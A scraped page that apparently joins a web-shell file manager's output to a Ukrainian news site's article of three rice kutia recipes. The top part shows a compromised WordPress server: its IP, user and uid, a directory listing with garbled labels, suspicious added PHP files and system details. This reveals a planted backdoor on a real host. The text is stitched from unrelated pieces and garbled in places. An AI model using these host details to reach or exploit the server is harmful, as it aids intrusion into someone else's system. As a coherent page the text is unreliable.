195.16.88.9 - Linux - whoami(krist287) - uid(1574) gid(1676)
kaylin

·

ϴΪ
ϼĿ¼ʱ޸ʱ
_.well-knownɾ 07552022-08-14 13:56:182022-04-19 08:48:45-
_ldɾ 07552022-08-14 13:54:002022-04-18 21:30:13-
_puɾ 07552022-08-14 13:54:032022-04-19 06:15:13-
doskaɾ 07552022-08-14 13:56:192022-05-13 00:21:36-
gboɾ 07552022-08-14 13:54:032022-04-21 16:29:19-
katalogɾ 07552022-08-14 13:54:032022-05-13 00:20:58-
nailɾ 07552022-08-14 13:54:062022-06-17 13:21:44-
testɾ 07552022-08-14 13:54:032022-04-18 15:34:19-
wakenɾ 07552022-08-11 02:53:342022-08-11 02:53:34-
wp-adminɾ 07552022-08-14 13:54:032022-04-18 17:42:42-
wp-contentɾ 07552022-08-14 15:22:092022-08-14 15:22:09-
wp-includesɾ 07552022-08-14 13:54:062022-04-18 17:42:24-
.htaccess 06442022-08-14 13:54:062022-06-30 09:23:1921.22 K
Damiendep 06442022-08-11 03:43:202022-08-11 03:43:209.20 K
backup.php 06442022-08-13 13:42:572022-08-13 13:42:57772 B
fibber.php 06442022-08-11 01:48:402022-08-11 01:48:4016.68 K
google5f28cd50ed83a936.html 06442022-08-14 13:54:032022-04-24 10:15:3853 B
index.php 06442022-08-14 15:22:112022-04-18 20:09:52405 B
license.txt 06442022-08-14 13:56:192022-04-18 20:09:5219.45 K
readme.html 06442022-08-14 13:54:062022-04-18 20:10:487.26 K
robots.txt 06442022-08-11 03:34:222022-08-11 03:34:22193 B
tmp.php 06442022-08-13 13:44:442022-08-13 13:44:44761 B
wp-activate.php 06442022-08-14 15:19:512022-04-18 20:09:527.00 K
wp-blog-header.php 06442022-08-14 13:55:502022-04-18 20:09:52351 B
wp-comments-post.php 06442022-08-14 13:54:062022-04-18 20:10:362.28 K
wp-config-sample.php 06442022-08-14 13:54:002022-04-18 20:10:482.93 K
wp-config.php 06442022-08-14 13:56:112022-04-18 20:09:523.69 K
wp-cron.php 06442022-08-14 15:21:522022-04-18 20:09:523.85 K
wp-links-opml.php 06442022-08-14 13:56:152022-04-18 20:09:522.44 K
wp-load.php 06442022-08-14 13:56:062022-04-18 20:09:523.81 K
wp-login.php 06442022-08-14 15:17:062022-04-18 20:09:5246.79 K
wp-mail.php 06442022-08-14 15:08:032022-04-18 20:09:528.38 K
wp-settings.php 06442022-08-14 13:54:062022-04-18 20:10:3622.49 K
wp-signup.php 06442022-08-14 15:08:562022-04-18 20:09:5231.21 K
wp-trackback.php 06442022-08-14 15:04:152022-04-18 20:09:524.64 K
wp.php 06442022-08-11 01:49:212022-08-11 01:49:21453 B
xmlrpc.php 06442022-08-14 15:21:182022-04-18 20:09:523.16 K
Ŀ¼[12] - ļ[25] - [0755]
Linux sr47.hostlife.net 3.10.0-962.3.2.lve1.5.49.el6h.x86_64 #1 SMP Thu Mar 4 07:40:03 EST 2021 x86_64
Apache/2
ТОП-3 рецепта рисової куті – Це Бориспіль
loader image
- Юна Українка подарувала Бориспільським кінологам «крилату конячку» яка виконує бажання. Днями, співробітники Кінологічного центру поліції Борисполя, які разом із ЗСУ та ТРО боронять рубежі Броварів, отримали цінний подарунок. Про це повідомляє прес-служба Кінологічного центру поліції в Київській області. Для наших відважних воїнів юна українка намалювала ліс, мирне небо та крилату конячку. За словами художниці, лоша здатне виконувати бажання. Варто лише доторкнутися до нього та подумати про те, чого хочеться найбільше. Картину юної мисткині передали на місце дислокації оборонців Берегині-волонтерки, які вже тривалий час докладають надлюдських зусиль аби забезпечувати воїнів усім необхідним. За бажанням авторки витвір потрапив саме до поліцейських кінологів. -
Меню Закрити

ТОП-3 рецепта рисової куті

/ 5. оценок:

Оценок пока нет. Поставьте оценку первым.

Кутя має дуже давню кулінарну історію, і багато варіантів приготування. Це слов’янське блюдо готують з різних сортів зерна: пшениці, ячменю, перловки, вівса, рису і гречки.

Для того, щоб кутя була ще смачніше, ви можете приготувати спеціальне пісне молоко. Зітреш в ступці або в блендері 200 грамів волоських або мигдальних горіхів, залийте кип’яченою охолодженою водою і додайте цукор за смаком. Якщо хочете, в цю суміш можна додати мак.

Рисова кутя традиційна

Вам потрібно:
• Один стакан рису;
• 100 грамів родзинок;
• 100 грамів меду.

Стакан рису промийте, потім покладіть в каструлю і залийте окропом в обсязі півтори склянки. Закрийте каструлю кришкою і почніть варити. Три хвилини варіть на сильному вогні, потім зменшіть вогонь і варіть ще шість хвилин.

Коли рис майже буде готовий, приберіть вогонь до мінімуму і дайте рису поваритися ще три хвилини. Вимкніть вогонь, дайте рису настоятися близько 12 хвилин.

В іншій каструлі зваріть родзинки, а мед розбавте невеликою кількістю води. Ізюм викладіть в рис і підсолодите кутю медом.

Рисова кутя з мигдалем

Вам потрібно:
• 200 грамів рису;
• 50 грамів мигдалю солодкого;
• Шість зерен мигдалю гіркого;
• Сто грамів родзинок;
• 100 грамів цукру.

Поставте рис варитися, коли ж вода закипить, рис відкиньте на сито, промийте його холодною водою і знову покладіть в каструлю. Знову залийте рис водою і варіть до м’якості.

Обдайте окропом солодкий і гіркий мигдаль, почистіть його і дрібно порубати або зітреш в ступці. Порубаний мигдаль покладіть в тарілку, додайте столову ложку води і одну столову ложку цукру.

Коли ж рис звариться, злийте воду і покладіть до нього порубаний мигдаль з цукром, викладіть залишився цукор і перемішайте.

Ізюм переберіть, відваріть в окремій каструлі, викладіть до куті і перемішайте.

Рисова кутя з чорносливом і курагою

Вам потрібно:
• 100 грамів рису;
• 50 грамів родзинок;
• 50 грамів кураги;
• 50 грамів чорносливу;
• Дві столові ложки меду;
• Одна столова ложка масла вершкового;
• Сіль.

Промийте рис, залийте його холодною водою і відставте на 2 години. Потім злийте воду, промийте рис, знову залийте його водою і поставте на варитися. Коли рис звариться, злегка його посоліть і покладіть одну столову ложку масла вершкового.

В окремому посуді замочіть курагу, чорнослив і родзинки в теплій воді, щоб фрукти трохи набухли. Потім просушіть і розріжте на шматочки. Додайте чорнослив, курагу і родзинки в рис, перемішайте і полийте розтопленим медом. Кутя готова.

А за яким рецептом готуєте кутю Ви?

Переглядів:: 1
Share on facebook
Share on telegram
Share on twitter
guest
0 коментарiв
Межтекстовые Отзывы
Посмотреть все комментарии
Авторизація
*
*
Реєстрація
*
*
*
Пароль не введено
*
Генерація паролю
0
Оставьте комментарий! Напишите, что думаете по поводу статьи.x
()
x